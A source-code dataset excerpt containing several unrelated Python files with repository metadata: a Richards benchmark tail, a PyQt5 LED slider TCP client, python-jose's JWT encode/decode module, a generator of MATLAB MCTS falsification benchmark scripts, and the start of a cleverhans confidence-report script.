            taskWorkArea.holdCount = 0
            taskWorkArea.qpktCount = 0
            IdleTask(I_IDLE, 1, 10000, TaskState().running(), IdleTaskRec())
            # Two work packets seed the worker task
            wkq = Packet(None, 0, K_WORK)
            wkq = Packet(wkq, 0, K_WORK)
            WorkTask(I_WORK, 1000, wkq, TaskState(
            ).waitingWithPacket(), WorkerTaskRec())
            # Three device packets seed each handler
            wkq = Packet(None, I_DEVA, K_DEV)
            wkq = Packet(wkq, I_DEVA, K_DEV)
            wkq = Packet(wkq, I_DEVA, K_DEV)
            HandlerTask(I_HANDLERA, 2000, wkq, TaskState(
            ).waitingWithPacket(), HandlerTaskRec())
            wkq = Packet(None, I_DEVB, K_DEV)
            wkq = Packet(wkq, I_DEVB, K_DEV)
            wkq = Packet(wkq, I_DEVB, K_DEV)
            HandlerTask(I_HANDLERB, 3000, wkq, TaskState(
            ).waitingWithPacket(), HandlerTaskRec())
            wkq = None
            DeviceTask(I_DEVA, 4000, wkq,
                       TaskState().waiting(), DeviceTaskRec())
            DeviceTask(I_DEVB, 5000, wkq,
                       TaskState().waiting(), DeviceTaskRec())
            schedule()
            # Known-good counter values for a correct run
            if taskWorkArea.holdCount == 9297 and taskWorkArea.qpktCount == 23246:
                pass
            else:
                return False
        return True
if __name__ == "__main__":
    # Run a single benchmark iteration by default; an optional first
    # command-line argument overrides the count.
    num_iterations = int(sys.argv[1]) if len(sys.argv) > 1 else 1
    Richards().run(num_iterations)
| 25.811321 | 102 | 0.567343 |
d0a5d3dc002db24fd5e6d16c04416c065a74ad3f | 1,390 | py | Python | client_led_slider.py | chenphilip888/rockpi4b-qt5-wifi | e36deba2b12b8c5a6586c92713651ba849d3190b | [
"MIT"
] | null | null | null | client_led_slider.py | chenphilip888/rockpi4b-qt5-wifi | e36deba2b12b8c5a6586c92713651ba849d3190b | [
"MIT"
] | null | null | null | client_led_slider.py | chenphilip888/rockpi4b-qt5-wifi | e36deba2b12b8c5a6586c92713651ba849d3190b | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import socket
import time
import sys
from PyQt5.QtWidgets import (QWidget, QMainWindow, QHBoxLayout, QStatusBar, QSlider, QApplication)
from PyQt5.QtCore import Qt
HOST = '192.168.86.205' # The remote host
PORT = 50007 # The same port as used by the server
# NOTE(review): the TCP connection is opened at import time and never
# explicitly closed; a connection failure here aborts the program before
# the GUI even starts.
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
class Client_led_slider(QMainWindow):
    '''Main window with a single horizontal slider; every slider change
    is sent over the module-level TCP socket and the server's reply is
    shown in the status bar.'''
    def __init__(self):
        super().__init__()
        self.initUI()
    def initUI(self):
        '''Build the window: a 0-100 slider inside a horizontal layout.'''
        self.widget = QWidget()
        self.setCentralWidget(self.widget)
        self.sld = QSlider(Qt.Horizontal, self)
        self.sld.setRange(0, 100)
        # Fires changeValue on every slider movement
        self.sld.valueChanged[int].connect(self.changeValue)
        hbox = QHBoxLayout(self.widget)
        hbox.addWidget(self.sld)
        self.widget.setLayout(hbox)
        self.statusBar()
        self.setGeometry(300, 300, 290, 150)
        self.setWindowTitle('client led slider')
        self.show()
    def changeValue(self):
        '''Send the slider position (0-100) as a decimal string and show
        the server's raw reply.
        NOTE(review): sendall/recv are blocking calls made on the GUI
        thread, so a slow or dead server freezes the UI -- confirm this
        is acceptable for the deployment.'''
        str_val = str(self.sld.value())
        sock.sendall(str_val.encode('utf-8'))
        data = sock.recv(1024)
        self.statusBar().showMessage(repr(data))
if __name__ == '__main__':
    # Start the Qt event loop with a single slider window.
    app = QApplication(sys.argv)
    window = Client_led_slider()
    sys.exit(app.exec_())
| 24.385965 | 98 | 0.605755 |
e8bf77eeac01b0a9f8b86fa914fce8bfc398b174 | 16,665 | py | Python | jose/jwt.py | Budovi/python-jose | a247cec58a5aa4ea5d3b45e3c90d55f66d98288f | [
"MIT"
] | 1 | 2018-12-19T10:30:05.000Z | 2018-12-19T10:30:05.000Z | jose/jwt.py | Budovi/python-jose | a247cec58a5aa4ea5d3b45e3c90d55f66d98288f | [
"MIT"
] | null | null | null | jose/jwt.py | Budovi/python-jose | a247cec58a5aa4ea5d3b45e3c90d55f66d98288f | [
"MIT"
] | null | null | null |
import json
from calendar import timegm
from collections import Mapping
from datetime import datetime
from datetime import timedelta
from six import string_types
from jose import jws
from .exceptions import JWSError
from .exceptions import JWTClaimsError
from .exceptions import JWTError
from .exceptions import ExpiredSignatureError
from .constants import ALGORITHMS
from .utils import timedelta_total_seconds, calculate_at_hash
def encode(claims, key, algorithm=ALGORITHMS.HS256, headers=None, access_token=None):
    """Sign a claims set and return the compact JWT string.

    A JWT is simply a JWS whose payload is a JSON claims set containing a
    few reserved, time-related claim names.

    Args:
        claims (dict): The claims set to sign.
        key (str or dict): Signing key; an individual JWK or a JWK set.
        algorithm (str, optional): Signing algorithm; defaults to HS256.
        headers (dict, optional): Extra headers merged over the defaults;
            on collision the values given here win.
        access_token (str, optional): When given, an 'at_hash' claim is
            computed from it and added to the claims.

    Returns:
        str: The string representation of the header, claims, and signature.

    Raises:
        JWTError: If there is an error encoding the claims.

    Examples:
        >>> jwt.encode({'a': 'b'}, 'secret', algorithm='HS256')
        'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhIjoiYiJ9.jiMyrsmD8AoHWeQgmxZ5yq8z0lXS67_QGs52AzC8Ru8'
    """
    # Reserved time claims may be passed as datetimes; the JWT spec wants
    # integer NumericDate values (seconds since the epoch, UTC).
    for claim_name in ('exp', 'iat', 'nbf'):
        claim_value = claims.get(claim_name)
        if isinstance(claim_value, datetime):
            claims[claim_name] = timegm(claim_value.utctimetuple())
    if access_token:
        claims['at_hash'] = calculate_at_hash(access_token,
                                              ALGORITHMS.HASHES[algorithm])
    return jws.sign(claims, key, headers=headers, algorithm=algorithm)
def decode(token, key, algorithms=None, options=None, audience=None,
           issuer=None, subject=None, access_token=None):
    """Verify a JWT's signature and validate its reserved claims.

    Args:
        token (str): The signed JWS/JWT to verify.
        key (str or dict): Key to verify with; an individual JWK or a
            JWK set.
        algorithms (str or list): Algorithms allowed for verification.
        options (dict): Flags that enable/disable individual checks plus
            a 'leeway' in seconds; any keys given here override these
            defaults::

                {
                    'verify_signature': True,
                    'verify_aud': True,
                    'verify_iat': True,
                    'verify_exp': True,
                    'verify_nbf': True,
                    'verify_iss': True,
                    'verify_sub': True,
                    'verify_jti': True,
                    'verify_at_hash': True,
                    'leeway': 0,
                }

        audience (str): Required audience when the token carries 'aud'.
        issuer (str or iterable): Acceptable issuer value(s) when the
            token carries 'iss'.
        subject (str): Required subject when the token carries 'sub'.
        access_token (str): Access token matched against 'at_hash' when
            the token carries that claim.

    Returns:
        dict: The validated claims set.

    Raises:
        JWTError: If the signature is invalid in any way.
        ExpiredSignatureError: If the signature has expired.
        JWTClaimsError: If any claim is invalid in any way.

    Examples:
        >>> payload = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhIjoiYiJ9.jiMyrsmD8AoHWeQgmxZ5yq8z0lXS67_QGs52AzC8Ru8'
        >>> jwt.decode(payload, 'secret', algorithms='HS256')
    """
    verify_options = {
        'verify_signature': True,
        'verify_aud': True,
        'verify_iat': True,
        'verify_exp': True,
        'verify_nbf': True,
        'verify_iss': True,
        'verify_sub': True,
        'verify_jti': True,
        'verify_at_hash': True,
        'leeway': 0,
    }
    if options:
        verify_options.update(options)
    try:
        payload = jws.verify(token, key, algorithms,
                             verify=verify_options.get('verify_signature', True))
    except JWSError as e:
        raise JWTError(e)
    # The at_hash check needs to know which hash the signing algorithm uses
    algorithm = jws.get_unverified_header(token)['alg']
    try:
        claims = json.loads(payload.decode('utf-8'))
    except ValueError as e:
        raise JWTError('Invalid payload string: %s' % e)
    if not isinstance(claims, Mapping):
        raise JWTError('Invalid payload string: must be a json object')
    _validate_claims(claims, audience=audience, issuer=issuer,
                     subject=subject, algorithm=algorithm,
                     access_token=access_token,
                     options=verify_options)
    return claims
def get_unverified_header(token):
    """Return the decoded JWT headers without any verification.

    Args:
        token (str): A signed JWT to decode the headers from.

    Returns:
        dict: The dict representation of the token headers.

    Raises:
        JWTError: If there is an exception decoding the token.
    """
    try:
        return jws.get_unverified_headers(token)
    except Exception:
        raise JWTError('Error decoding token headers.')
def get_unverified_headers(token):
    """Backwards-compatible alias for :func:`get_unverified_header`.

    Args:
        token (str): A signed JWT to decode the headers from.

    Returns:
        dict: The dict representation of the token headers.

    Raises:
        JWTError: If there is an exception decoding the token.
    """
    return get_unverified_header(token)
def get_unverified_claims(token):
    """Return the decoded JWT claims without any verification.

    Args:
        token (str): A signed JWT to decode the claims from.

    Returns:
        dict: The dict representation of the token claims.

    Raises:
        JWTError: If there is an exception decoding the token.
    """
    try:
        raw_claims = jws.get_unverified_claims(token)
    except Exception:
        raise JWTError('Error decoding token claims.')
    try:
        claims = json.loads(raw_claims.decode('utf-8'))
    except ValueError as e:
        raise JWTError('Invalid claims string: %s' % e)
    if not isinstance(claims, Mapping):
        raise JWTError('Invalid claims string: must be a json object')
    return claims
def _validate_iat(claims):
"""Validates that the 'iat' claim is valid.
The "iat" (issued at) claim identifies the time at which the JWT was
issued. This claim can be used to determine the age of the JWT. Its
value MUST be a number containing a NumericDate value. Use of this
claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
"""
if 'iat' not in claims:
return
try:
int(claims['iat'])
except ValueError:
raise JWTClaimsError('Issued At claim (iat) must be an integer.')
def _validate_nbf(claims, leeway=0):
"""Validates that the 'nbf' claim is valid.
The "nbf" (not before) claim identifies the time before which the JWT
MUST NOT be accepted for processing. The processing of the "nbf"
claim requires that the current date/time MUST be after or equal to
the not-before date/time listed in the "nbf" claim. Implementers MAY
provide for some small leeway, usually no more than a few minutes, to
account for clock skew. Its value MUST be a number containing a
NumericDate value. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
leeway (int): The number of seconds of skew that is allowed.
"""
if 'nbf' not in claims:
return
try:
nbf = int(claims['nbf'])
except ValueError:
raise JWTClaimsError('Not Before claim (nbf) must be an integer.')
now = timegm(datetime.utcnow().utctimetuple())
if nbf > (now + leeway):
raise JWTClaimsError('The token is not yet valid (nbf)')
def _validate_exp(claims, leeway=0):
"""Validates that the 'exp' claim is valid.
The "exp" (expiration time) claim identifies the expiration time on
or after which the JWT MUST NOT be accepted for processing. The
processing of the "exp" claim requires that the current date/time
MUST be before the expiration date/time listed in the "exp" claim.
Implementers MAY provide for some small leeway, usually no more than
a few minutes, to account for clock skew. Its value MUST be a number
containing a NumericDate value. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
leeway (int): The number of seconds of skew that is allowed.
"""
if 'exp' not in claims:
return
try:
exp = int(claims['exp'])
except ValueError:
raise JWTClaimsError('Expiration Time claim (exp) must be an integer.')
now = timegm(datetime.utcnow().utctimetuple())
if exp < (now - leeway):
raise ExpiredSignatureError('Signature has expired.')
def _validate_aud(claims, audience=None):
"""Validates that the 'aud' claim is valid.
The "aud" (audience) claim identifies the recipients that the JWT is
intended for. Each principal intended to process the JWT MUST
identify itself with a value in the audience claim. If the principal
processing the claim does not identify itself with a value in the
"aud" claim when this claim is present, then the JWT MUST be
rejected. In the general case, the "aud" value is an array of case-
sensitive strings, each containing a StringOrURI value. In the
special case when the JWT has one audience, the "aud" value MAY be a
single case-sensitive string containing a StringOrURI value. The
interpretation of audience values is generally application specific.
Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
audience (str): The audience that is verifying the token.
"""
if 'aud' not in claims:
# if audience:
# raise JWTError('Audience claim expected, but not in claims')
return
audience_claims = claims['aud']
if isinstance(audience_claims, string_types):
audience_claims = [audience_claims]
if not isinstance(audience_claims, list):
raise JWTClaimsError('Invalid claim format in token')
if any(not isinstance(c, string_types) for c in audience_claims):
raise JWTClaimsError('Invalid claim format in token')
if audience not in audience_claims:
raise JWTClaimsError('Invalid audience')
def _validate_iss(claims, issuer=None):
"""Validates that the 'iss' claim is valid.
The "iss" (issuer) claim identifies the principal that issued the
JWT. The processing of this claim is generally application specific.
The "iss" value is a case-sensitive string containing a StringOrURI
value. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
issuer (str or iterable): Acceptable value(s) for the issuer that
signed the token.
"""
if issuer is not None:
if isinstance(issuer, string_types):
issuer = (issuer,)
if claims.get('iss') not in issuer:
raise JWTClaimsError('Invalid issuer')
def _validate_sub(claims, subject=None):
"""Validates that the 'sub' claim is valid.
The "sub" (subject) claim identifies the principal that is the
subject of the JWT. The claims in a JWT are normally statements
about the subject. The subject value MUST either be scoped to be
locally unique in the context of the issuer or be globally unique.
The processing of this claim is generally application specific. The
"sub" value is a case-sensitive string containing a StringOrURI
value. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
subject (str): The subject of the token.
"""
if 'sub' not in claims:
return
if not isinstance(claims['sub'], string_types):
raise JWTClaimsError('Subject must be a string.')
if subject is not None:
if claims.get('sub') != subject:
raise JWTClaimsError('Invalid subject')
def _validate_jti(claims):
"""Validates that the 'jti' claim is valid.
The "jti" (JWT ID) claim provides a unique identifier for the JWT.
The identifier value MUST be assigned in a manner that ensures that
there is a negligible probability that the same value will be
accidentally assigned to a different data object; if the application
uses multiple issuers, collisions MUST be prevented among values
produced by different issuers as well. The "jti" claim can be used
to prevent the JWT from being replayed. The "jti" value is a case-
sensitive string. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
"""
if 'jti' not in claims:
return
if not isinstance(claims['jti'], string_types):
raise JWTClaimsError('JWT ID must be a string.')
def _validate_at_hash(claims, access_token, algorithm):
"""
Validates that the 'at_hash' is valid.
Its value is the base64url encoding of the left-most half of the hash
of the octets of the ASCII representation of the access_token value,
where the hash algorithm used is the hash algorithm used in the alg
Header Parameter of the ID Token's JOSE Header. For instance, if the
alg is RS256, hash the access_token value with SHA-256, then take the
left-most 128 bits and base64url encode them. The at_hash value is a
case sensitive string. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
access_token (str): The access token returned by the OpenID Provider.
algorithm (str): The algorithm used to sign the JWT, as specified by
the token headers.
"""
if 'at_hash' not in claims:
return
if not access_token:
msg = 'No access_token provided to compare against at_hash claim.'
raise JWTClaimsError(msg)
try:
expected_hash = calculate_at_hash(access_token,
ALGORITHMS.HASHES[algorithm])
except (TypeError, ValueError):
msg = 'Unable to calculate at_hash to verify against token claims.'
raise JWTClaimsError(msg)
if claims['at_hash'] != expected_hash:
raise JWTClaimsError('at_hash claim does not match access_token.')
def _validate_claims(claims, audience=None, issuer=None, subject=None,
                     algorithm=None, access_token=None, options=None):
    """Run every reserved-claim validation that *options* enables.

    Args:
        claims (dict): Decoded claims set.
        audience (str): Expected audience, or None.
        issuer (str or iterable): Acceptable issuer value(s), or None.
        subject (str): Expected subject, or None.
        algorithm (str): JWS algorithm from the token header, used for
            the at_hash check.
        access_token (str): Access token matched against at_hash, or None.
        options (dict): 'verify_*' flags plus 'leeway'; must be provided.

    Raises:
        JWTError: If *audience* is neither a string nor None.
        JWTClaimsError / ExpiredSignatureError: Propagated from the
            individual claim validators.
    """
    # Normalize leeway so the validators always get seconds as a number
    leeway = options.get('leeway', 0)
    if isinstance(leeway, timedelta):
        leeway = timedelta_total_seconds(leeway)
    if not isinstance(audience, (string_types, type(None))):
        raise JWTError('audience must be a string or None')
    if options.get('verify_iat'):
        _validate_iat(claims)
    if options.get('verify_nbf'):
        _validate_nbf(claims, leeway=leeway)
    if options.get('verify_exp'):
        _validate_exp(claims, leeway=leeway)
    if options.get('verify_aud'):
        _validate_aud(claims, audience=audience)
    if options.get('verify_iss'):
        _validate_iss(claims, issuer=issuer)
    if options.get('verify_sub'):
        _validate_sub(claims, subject=subject)
    if options.get('verify_jti'):
        _validate_jti(claims)
    if options.get('verify_at_hash'):
        _validate_at_hash(claims, access_token, algorithm)
| 34.64657 | 117 | 0.666787 |
ba08121f88fb3ccf2749280317bf3409d5497413 | 9,944 | py | Python | test/MCTS_test.py | choshina/coverage-confidence | c8b7fb2dc43094f0eb78abbdd6211dcefb6d4a63 | [
"CNRI-Python"
] | null | null | null | test/MCTS_test.py | choshina/coverage-confidence | c8b7fb2dc43094f0eb78abbdd6211dcefb6d4a63 | [
"CNRI-Python"
] | null | null | null | test/MCTS_test.py | choshina/coverage-confidence | c8b7fb2dc43094f0eb78abbdd6211dcefb6d4a63 | [
"CNRI-Python"
] | null | null | null | import sys
import os
# Configuration values filled in by the config-file parser below
# (this script is Python 2 -- see the print statement after the parser).
model = ''           # Simulink model name
algorithm = ''
optimization = []    # hill-climbing strategies to benchmark
phi_str = []         # STL properties as '<name>;<formula>' strings
controlpoints = ''   # kept as a string; see parser note below
scalar = []
partitions = []
T_playout = []
N_max = []
input_name = []
input_range = []     # [lo, hi] pair per input signal
# Parser state: 0 = expecting a "<section> <count>" header line,
# 1 = reading the remaining <linenum> payload lines of section <arg>
status = 0
arg = ''
linenum = 0
timespan = ''
parameters = []      # verbatim MATLAB parameter lines
T = ''
loadfile = ''
addpath = []
argument = ''        # filled from 'arg' sections
trials = 30          # repetitions written into each generated script
#fal_home = os.environ['FALHOME']
#br_home = os.environ['BRHOME']
with open('./'+sys.argv[1],'r') as conf:
    # Two-state parser for the benchmark config file: a header line gives
    # "<section-name> <line-count>", and the following <line-count> lines
    # are that section's payload.
    for line in conf.readlines():
        argu = line.strip().split()
        if status == 0:
            # Header line: remember the section and how many lines follow
            status = 1
            arg = argu[0]
            linenum = int(argu[1])
        elif status == 1:
            linenum = linenum - 1
            if arg == 'model':
                model = argu[0]
            elif arg == 'optimization':
                optimization.append(argu[0])
            elif arg == 'phi':
                # Rebuild the formula as '<name>;<formula with spaces>'
                complete_phi = argu[0]+';'+argu[1]
                for a in argu[2:]:
                    complete_phi = complete_phi + ' '+ a
                phi_str.append(complete_phi)
            elif arg == 'controlpoints':
                # NOTE(review): stored as a string and iterated
                # character-by-character by the generator loop below --
                # confirm multi-digit control point counts are intended
                controlpoints = argu[0]
            elif arg == 'scalar':
                scalar.append(float(argu[0]))
            elif arg == 'partitions':
                # NOTE(review): Python 2 map() returns a list here
                partitions.append(map(int,argu))
            elif arg == 'T_playout':
                T_playout.append(int(argu[0]))
            elif arg == 'N_max':
                N_max.append(int(argu[0]))
            elif arg == 'input_name':
                input_name.append(argu[0])
            elif arg == 'input_range':
                input_range.append([float(argu[0]),float(argu[1])])
            elif arg == 'algorithm':
                algorithm = argu[0]
            elif arg == 'timespan':
                timespan = argu[0]
            elif arg == 'parameters':
                parameters.append(argu[0])
            elif arg == 'T':
                T = argu[0]
            elif arg == 'loadfile':
                loadfile = argu[0]
            elif arg == 'addpath':
                addpath.append(argu[0])
            elif arg == 'arg':
                argument = argu[0]
            else:
                # NOTE(review): unrecognized sections take this branch and
                # skip the status reset below, so 'status' stays 1 and
                # 'linenum' can go negative -- confirm this is intended
                continue
            if linenum == 0:
                # Section complete: expect a new header next
                status = 0
print partitions
for ph in phi_str:
for cp in controlpoints:
for c in scalar:
for par in partitions:
for nm in N_max:
for opt in optimization:
for tp in T_playout:
property = ph.split(';')
par_str = '_'.join(str(i) for i in par)
filename = model + '_' + 'mcts' + '_'+property[0]+'_' + str(cp) +'_'+str(nm)+ '_' + str(tp) + '_' + opt
param = '\n'.join(parameters)
with open('benchmark/'+filename,'w') as bm:
bm.write('#!/bin/sh\n')
bm.write('csv=$1\n')
bm.write('matlab -nodesktop -nosplash <<EOF\n')
bm.write('clear;\n')
for ap in addpath:
bm.write('addpath(genpath(\'' + ap + '\'));\n')
bm.write('addpath(genpath(\'' + '.' + '\'));\n')
if loadfile!='':
bm.write('load '+loadfile + '\n')
bm.write('InitBreach;\n\n')
bm.write(param+ '\n')
bm.write('mdl = \''+ model + '\';\n')
bm.write('Br = BreachSimulinkSystem(mdl);\n')
bm.write('br = Br.copy();\n')
bm.write('N_max =' + str(nm) + ';\n')
bm.write('scalar = '+ str(c) +';\n')
bm.write('phi_str = \''+ property[1] +'\';\n')
bm.write('phi = STL_Formula(\'phi1\',phi_str);\n')
bm.write('T = ' + T + ';\n')
bm.write('controlpoints = '+ str(cp)+ ';\n')
bm.write('hill_climbing_by = \''+ opt+'\';\n')
bm.write('T_playout = '+str(tp)+';\n')
bm.write('input_name = {\''+input_name[0]+'\'')
for inm in input_name[1:]:
bm.write(',\'')
bm.write(inm)
bm.write('\'')
bm.write('};\n')
bm.write('input_range = [['+ str(input_range[0][0])+' '+str(input_range[0][1])+']')
for ir in input_range[1:]:
bm.write(';[')
bm.write(str(ir[0])+' '+str(ir[1]))
bm.write(']')
bm.write('];\n')
bm.write('partitions = ['+ str(par[0]))
for p in par[1:]:
bm.write(' ')
bm.write(str(p))
bm.write('];\n')
bm.write('filename = \''+filename+'\';\n')
bm.write('algorithm = \''+algorithm+ '\';\n')
bm.write('falsified_at_all = [];\n')
#bm.write('total_time = [];\n')
#bm.write('falsified_in_preprocessing = [];\n')
#bm.write('time_for_preprocessing = [];\n')
#bm.write('falsified_after_preprocessing = [];\n')
#bm.write('time_for_postpreprocessing = [];\n')
#bm.write('best_robustness = [];\n')
#bm.write('simulation_pre = [];\n')
#bm.write('simulation_after = [];\n')
#bm.write('simulations = [];\n')
bm.write('min_rob = [];\n')
bm.write('coverage = [];\n')
bm.write('time_cov = [];\n')
bm.write('trials =' + str(trials)+';\n')
bm.write('for i = 1:trials\n')
bm.write('\tm = MCTS(br,N_max, scalar, phi, T, controlpoints, hill_climbing_by, T_playout, input_name, input_range, partitions);\n')
bm.write('\tlog = m.log;\n')
# bm.write('\ttic\n')
#
# bm.write('\trange_t = get_full_range(input_range, controlpoints);\n')
# bm.write('\tct = CoverageTester(range_t, arg, log);\n')
# bm.write('\ttime = toc;\n')
# bm.write('\tmin_rob = [min_rob;ct.min_rob];\n')
# bm.write('\tcoverage = [coverage; ct.coverage];\n')
# bm.write('\ttime_cov = [time_cov;time];\n')
#bm.write('\t m = MCTS(br, N_max, scalar, phi, T, controlpoints, hill_climbing_by, T_playout, input_name, input_range, partitions);\n')
bm.write('\tlogname = strcat(\'test/log/' + filename + '_\', int2str(i));\n')
bm.write('\tsave(logname, \'log\');\n')
#bm.write('\t falsified_in_preprocessing = [falsified_in_preprocessing; m.falsified];\n')
#bm.write('\t time = toc;\n')
#bm.write('\t time_for_preprocessing = [time_for_preprocessing; time];\n')
#bm.write('\t simulation_pre = [simulation_pre;m.simulations];\n')
#bm.write('\t if m.falsified == 0\n')
#bm.write('\t\t BR = Br.copy();\n')
#bm.write('\t\t BR.Sys.tspan = '+ timespan +';\n')
#bm.write('\t\t input_gen.type = \'UniStep\';\n')
#bm.write('\t\t input_gen.cp = controlpoints;\n')
#bm.write('\t\t BR.SetInputGen(input_gen);\n')
#bm.write('\t\t range = m.best_children_range;\n')
#bm.write('\t\t r = numel(range);\n')
#bm.write('\t\t for cpi = 1:controlpoints\n')
#bm.write('\t\t\t for k = 1:numel(input_name)\n')
#bm.write('\t\t\t\t sig_name = strcat(input_name(k), \'_u\', num2str(cpi-1));\n')
#bm.write('\t\t\t\t if cpi <= r\n')
#bm.write('\t\t\t\t\t BR.SetParamRanges({sig_name},range(cpi).get_signal(k));\n')
#bm.write('\t\t\t\t else\n')
#bm.write('\t\t\t\t\t BR.SetParamRanges({sig_name},input_range(k,:));\n')
#bm.write('\t\t\t\t end\n')
#bm.write('\t\t\t end\n')
#bm.write('\t\t end\n')
#bm.write('\t\t falsif_pb = FalsificationProblem(BR, phi);\n')
#bm.write('\t\t falsif_pb.max_time = 300;\n')
#bm.write('\t\t falsif_pb.setup_solver(\'cmaes\');\n')
#bm.write('\t\t falsif_pb.solve();\n')
#bm.write('\t\t if falsif_pb.obj_best < 0\n')
#bm.write('\t\t\t time_for_postpreprocessing = [time_for_postpreprocessing; falsif_pb.time_spent];\n')
#bm.write('\t\t\t falsified_after_preprocessing = [falsified_after_preprocessing; 1];\n')
#bm.write('\t\t else\n')
#bm.write('\t\t\t time_for_postpreprocessing = [time_for_postpreprocessing; falsif_pb.time_spent];\n')
#bm.write('\t\t\t falsified_after_preprocessing = [falsified_after_preprocessing;0];\n')
#bm.write('\t\t end\n')
#bm.write('\t\tsimulation_after =[simulation_after;falsif_pb.nb_obj_eval];\n')
#bm.write('\t\tbest_robustness = [best_robustness;falsif_pb.obj_best];\n')
#bm.write('\t else\n')
#bm.write('\t\t falsified_after_preprocessing = [falsified_after_preprocessing; 1];\n')
#bm.write('\t\t time_for_postpreprocessing = [time_for_postpreprocessing; 0];\n')
#bm.write('\t\t best_robustness = [best_robustness;m.root_node.reward];\n')
#bm.write('\t\t simulation_after = [simulation_after;0];\n')
#bm.write('\t end\n')
bm.write('end\n')
#bm.write('falsified_at_all = falsified_after_preprocessing;\n')
#bm.write('total_time = time_for_preprocessing + time_for_postpreprocessing;\n')
#bm.write('simulations = simulation_pre + simulation_after;\n')
# bm.write('phi_str = {phi_str')
# for j in range(1,trials):
# bm.write(';phi_str')
# bm.write('};\n')
# bm.write('algorithm = {algorithm')
# for j in range(1,trials):
# bm.write(';algorithm')
# bm.write('};\n')
#bm.write('hill_climbing_by = {hill_climbing_by')
#for j in range(1,trials):
# bm.write(';hill_climbing_by')
# bm.write('};\n')
# bm.write('filename = {filename')
# for j in range(1,trials):
# bm.write(';filename')
# bm.write('};\n')
# bm.write('controlpoints = controlpoints*ones(trials,1);\n')
#bm.write('scalar = scalar*ones(trials,1);\n')
#bm.write('partitions = [partitions(1)*ones(trials,1) partitions(2)*ones(trials,1)];\n') #not generalized
#bm.write('partis = [];\n')
#bm.write('for u = 1:numel(partitions)\n')
#bm.write('\tpartis = [partis partitions(u)*ones(trials,1)];\n')
#bm.write('end\n')
#bm.write('T_playout = T_playout*ones(trials,1);\n')
# bm.write('N_max = N_max*ones(trials,1);\n')
#bm.write('result = table(filename, phi_str, algorithm, hill_climbing_by, controlpoints, scalar, partis, T_playout, N_max, falsified_at_all, total_time, simulations, best_robustness, falsified_in_preprocessing, time_for_preprocessing, falsified_after_preprocessing, time_for_postpreprocessing);\n')
# bm.write('result = table(filename, phi_str, algorithm, controlpoints, N_max, min_rob, coverage, time_cov);\n')
# bm.write('writetable(result,\'$csv\',\'Delimiter\',\';\');\n')
# bm.write('save_system(mdl+\'_breach\',false);\n')
bm.write('quit\n')
bm.write('EOF\n')
| 40.422764 | 306 | 0.567981 |
544046bd19bc3dcf26bc0fe9edb7569c58870669 | 2,193 | py | Python | quiz/users/models.py | diego-marcelino/valora-quiz | 3218628a857153449dde47ed52d60bc901e9be0b | [
"MIT"
] | null | null | null | quiz/users/models.py | diego-marcelino/valora-quiz | 3218628a857153449dde47ed52d60bc901e9be0b | [
"MIT"
] | 3 | 2022-02-28T11:07:18.000Z | 2022-03-02T11:07:20.000Z | quiz/users/models.py | diego-marcelino/valora-quiz | 3218628a857153449dde47ed52d60bc901e9be0b | [
"MIT"
] | null | null | null | from django.contrib.auth.models import AbstractUser
from django.contrib.auth.models import BaseUserManager
from django.db import models
from django.db.models import CharField
from django.utils.translation import gettext_lazy as _
from quiz.core.events.new_user import notify as notify_new_user
class UserManager(BaseUserManager):
    """Custom manager that enforces a password on user creation."""

    def create_user(self, name, username, role, password=None, **kwargs):
        """Create, persist and announce a regular user.

        Raises TypeError when no password is supplied, so accounts can never
        be created without credentials.
        """
        if password is None:
            raise TypeError(_('User should set a password'))
        new_user = self.model(name=name, username=username, role=role, **kwargs)
        new_user.set_password(password)
        new_user.save()
        # Fire the application-level "new user" event after the row exists.
        notify_new_user(new_user)
        return new_user

    def create_superuser(self, username, name='', password=None, **kwargs):
        """Create a staff superuser on top of ``create_user``."""
        superuser = self.create_user(name, username, User.Role.SUPERUSER,
                                     password, **kwargs)
        superuser.is_superuser = True
        superuser.is_staff = True
        superuser.save()
        return superuser
class User(AbstractUser):
    """Default user for Valora Quiz."""

    class Role(models.TextChoices):
        """Closed set of roles a user may hold."""

        ADMIN = 'A', _('Admin')
        PLAYER = 'P', _('Player')
        SUPERUSER = 'S', _('Superuser')

    # A single free-form name is used instead of first/last name, since the
    # first/last split does not cover name patterns around the globe.
    name = CharField(_('Name of User'), blank=True, max_length=255)
    username = CharField(_('Username of user'), blank=False, max_length=50,
                         db_index=True, unique=True)
    role = CharField(_('Role of the user'), max_length=1, choices=Role.choices,
                     default=Role.PLAYER)

    objects = UserManager()

    USERNAME_FIELD = 'username'
    REQUIRED_FIELDS = ['password']

    def __str__(self):
        """Use the unique username as the printable form."""
        return self.username

    class Meta:
        """Model-level options: naming, default order and indexing."""

        verbose_name = _('user')
        verbose_name_plural = _('users')
        ordering = ['username']
        indexes = [models.Index(fields=['username'], name='username_idx')]
59d9a5de3ed1cc29bc72fcebb7bda7363d618922 | 4,027 | py | Python | scripts/make_confidence_report.py | iamgroot42/cleverhans | 53da9cd6daf9d7457800831c3eaa75f729a39145 | [
"MIT"
] | 21 | 2019-06-07T17:05:30.000Z | 2022-02-07T03:25:15.000Z | scripts/make_confidence_report.py | iamgroot42/cleverhans | 53da9cd6daf9d7457800831c3eaa75f729a39145 | [
"MIT"
] | 1 | 2021-03-01T15:06:09.000Z | 2021-03-01T15:06:09.000Z | scripts/make_confidence_report.py | iamgroot42/cleverhans | 53da9cd6daf9d7457800831c3eaa75f729a39145 | [
"MIT"
] | 8 | 2019-06-11T03:06:29.000Z | 2022-01-18T04:18:27.000Z | #!/usr/bin/env python3
"""
make_confidence_report.py
Usage:
python make_confidence_report.py model.joblib
where model.joblib is a file created by cleverhans.serial.save containing
a picklable cleverhans.model.Model instance.
This script will run the model on a variety of types of data and save an
